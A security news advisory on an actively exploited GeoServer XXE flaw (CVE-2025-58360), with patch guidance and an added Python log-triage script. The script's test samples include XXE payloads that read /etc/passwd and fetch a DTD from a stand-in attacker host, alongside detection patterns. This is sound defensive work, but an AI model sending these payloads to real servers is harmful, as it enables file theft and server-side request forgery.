CISA Warns of Active GeoServer XXE Exploits

December 12, 2025 at 12:00 AM

CISA has added a high-severity OSGeo GeoServer flaw to its Known Exploited Vulnerabilities (KEV) catalog after evidence of in-the-wild abuse, urging immediate patching by affected organizations.

Key vulnerability details

  • ID and severity: CVE-2025-58360 (CVSS 8.2), unauthenticated XML External Entity (XXE)
  • Affected software: OSGeo GeoServer
  • Discovery credit: AI-powered platform XBOW
  • Vulnerable endpoint: the WMS GetMap operation at /geoserver/wms when it is invoked with an XML request; the parser that handles that XML resolves external entities declared in the document's DTD

Affected versions and packages

  • Versions: All releases prior to and including 2.25.5, and 2.26.0 through 2.26.1
  • Fixed in: 2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1
  • Impacted packages:
    • docker.osgeo.org/geoserver
    • org.geoserver.web:gs-web-app (Maven)
    • org.geoserver:gs-wms (Maven)

Risk and impact

  • Arbitrary file read from the server filesystem, limited to files readable by the account GeoServer runs as
  • Server-Side Request Forgery (SSRF): the server fetches attacker-chosen URLs from its own network position, reaching internal services
  • Denial-of-service (DoS) via resource exhaustion, for example recursively expanding entity declarations

Exploitation status

  • Specific attack details are not public, but the Canadian Centre for Cyber Security reported on November 28, 2025 that an exploit for CVE-2025-58360 is active in the wild.
  • Context: A separate critical GeoServer issue, CVE-2024-36401 (CVSS 9.8), has been widely exploited over the past year.

Recommended actions

  • Patch immediately to one of the fixed versions (2.25.6, 2.26.2, 2.27.0, 2.28.0, or 2.28.1)
  • Update affected Docker images and Maven dependencies listed above
  • Restrict network exposure of the WMS endpoint (it should not be reachable unauthenticated from the Internet unless it has to be) and reject XML requests that carry a DOCTYPE declaration at a reverse proxy or WAF; a legitimate GetMap XML document has no need for one
  • If you embed the gs-wms Maven module in your own application, disable DTD processing and external entity resolution in its XML parsers as defence in depth; this does not replace patching
  • Monitor for GetMap XML requests containing DOCTYPE or ENTITY declarations, outbound connections from the GeoServer host to unexpected destinations (a sign of SSRF or out-of-band exfiltration), and unusual CPU or memory use on the GeoServer process
  • Federal Civilian Executive Branch (FCEB) agencies should complete remediation by January 1, 2026
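The two checks a practitioner wants from this advisory are "is my deployment in an affected version range?" and "what does an XXE-shaped GetMap request look like in the logs?". The script below is an added example, not code from GeoServer or from the article. The version ranges are the ones stated above; the WMS path pattern (default /geoserver context, optional workspace prefix, shared /ows dispatcher) is an assumption about a typical deployment, and the request bodies are constructed samples, not captured traffic.

```python
"""Triage helpers for CVE-2025-58360 (GeoServer WMS GetMap XXE).

Added example, not GeoServer project code.  Version ranges are the ones the
advisory states; the request samples below are constructed for illustration.
"""
import re

# Affected per the advisory: <= 2.25.5 and 2.26.0 .. 2.26.1.
VULNERABLE_BEFORE = (2, 25, 6)
VULNERABLE_RANGE = ((2, 26, 0), (2, 26, 1))


def parse_version(text):
    """'2.26.1', '2.26' or '2.27.0-SNAPSHOT' -> (2, 26, 1); suffixes are ignored."""
    nums = []
    for part in text.strip().split(".")[:3]:
        m = re.match(r"\d+", part)
        nums.append(int(m.group()) if m else 0)
    return tuple(nums + [0] * (3 - len(nums)))


def is_vulnerable(version):
    """True if the GeoServer version falls inside an affected range."""
    v = parse_version(version)
    lo, hi = VULNERABLE_RANGE
    return v < VULNERABLE_BEFORE or lo <= v <= hi


# Assumption: default /geoserver context path, optionally workspace-prefixed
# (/geoserver/<ws>/wms), plus the shared /ows dispatcher.
WMS_PATH = re.compile(r"^/geoserver(?:/[\w-]+)?/(?:wms|ows)(?:[/?]|$)", re.I)

# A legitimate GetMap XML document carries no DTD, so any DOCTYPE is suspect;
# entity declarations pointing at file: or network URIs are the real signal.
XXE_MARKERS = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.I),
    "external_entity": re.compile(r"<!ENTITY\s+%?\s*[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.I),
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.I),
    "file_uri": re.compile(r"\bfile:/", re.I),
    "remote_fetch": re.compile(
        r"""(?:SYSTEM|PUBLIC)\s+(?:["'][^"']*["']\s+)?["'](?:https?|ftp)://""", re.I),
}
HIGH = {"external_entity", "parameter_entity", "file_uri", "remote_fetch"}


def classify_body(body):
    """Return (severity, sorted marker names) for one XML request body."""
    markers = sorted(name for name, rx in XXE_MARKERS.items() if rx.search(body))
    if HIGH & set(markers):
        return "high", markers
    return ("medium" if markers else "none"), markers


def scan_requests(requests):
    """Flag XXE-shaped bodies POSTed to WMS paths.

    Each request is a dict with 'method', 'path' and decoded 'body' text,
    e.g. reconstructed from a proxy or WAF log that captures bodies.
    """
    findings = []
    for req in requests:
        if req["method"].upper() != "POST" or not WMS_PATH.match(req["path"]):
            continue
        severity, markers = classify_body(req.get("body", ""))
        if severity != "none":
            findings.append({"path": req["path"], "severity": severity, "markers": markers})
    return findings


GETMAP = '<ogc:GetMap xmlns:ogc="http://www.opengis.net/ows" version="1.1.1" service="WMS">'
SAMPLE_REQUESTS = [  # constructed, not captured traffic
    {"method": "POST", "path": "/geoserver/wms",  # ordinary GetMap, no DTD
     "body": GETMAP + '<BoundingBox srsName="EPSG:4326" minx="-180" miny="-90" '
             'maxx="180" maxy="90"/><Output><Format>image/png</Format></Output></ogc:GetMap>'},
    {"method": "POST", "path": "/geoserver/topp/wms",  # file read via a general entity
     "body": '<!DOCTYPE GetMap [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>' + GETMAP
             + '<StyledLayerDescriptor>&xxe;</StyledLayerDescriptor></ogc:GetMap>'},
    {"method": "POST", "path": "/geoserver/ows?service=WMS",  # SSRF / out-of-band via parameter entity
     "body": '<!DOCTYPE GetMap [<!ENTITY % dtd SYSTEM "http://attacker.invalid/x.dtd"> %dtd;]>'
             + GETMAP + "</ogc:GetMap>"},
    {"method": "POST", "path": "/geoserver/wfs",  # DTD on a non-WMS path: outside this rule's scope
     "body": '<!DOCTYPE x [<!ENTITY e SYSTEM "file:///etc/hosts">]><x>&e;</x>'},
]

if __name__ == "__main__":
    for ver in ("2.24.2", "2.25.5", "2.25.6", "2.26.1", "2.26.2", "2.27.0"):
        print(f"{ver:<8} vulnerable={is_vulnerable(ver)}")
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"{f['severity']:<6} {f['path']}  markers={','.join(f['markers'])}")
```

The severity split is deliberate: a bare DOCTYPE on a GetMap request is worth a look but may be a misconfigured client, whereas an ENTITY declaration that names a file: or network URI, or a parameter entity (the building block of blind, out-of-band XXE), is the shape of an actual attempt. The version parser ignores pre-release suffixes, so a 2.26.2-SNAPSHOT build is reported as fixed even though it may predate the patch; confirm against the build date if you run snapshots.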

Source: The Hacker News
